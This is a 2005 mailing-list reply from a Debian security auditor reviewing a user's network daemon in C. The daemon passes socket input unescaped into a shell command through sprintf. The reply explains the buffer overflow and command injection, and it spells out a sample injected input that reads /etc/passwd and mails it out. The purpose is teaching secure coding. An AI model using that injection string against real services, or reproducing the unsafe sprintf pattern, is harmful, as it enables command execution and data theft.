On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cu?llar Vald?s wrote: > Marc, thanks that was the problem !!! > > sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big > big big mistake
It certainly was. > I added the hole path to the instructions: > > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer); > > Thanks to all of you who helped me !! :-) You deamonize. You open a socket. You read input from that socket - carefully avoiding buffer overflows - then you run the command: /usr/local/bin/say -s 4 -a "the text you read" Firstly you don't avoid a simple buffer overflow. Although you have two buffers, 'buffer' for receiving the message from the network and 'message' for running the command are both the same size you don't account for the extra characters when you're copying: sprintf(message, "say -s 4 -a \"%s\"", buffer); At least change that to: snprintf(message, sizeof(message) "say -s 4 -a \"%s\"", buffer); Secondly, and this is the biggie, you don't quote or process the characters which are read from the network. Consider what would happen if a malicious user sent this: "; cat /etc/passwd | mail [EMAIL PROTECTED] ; echo " You would run this commend: /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo "" Effectively you're allowing any user who can connect to your server to execute arbitary commands. If this is started by init you're likely running as root too. Check that the characters you read from the network are only [a-zA-Z ] and you're probably OK. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
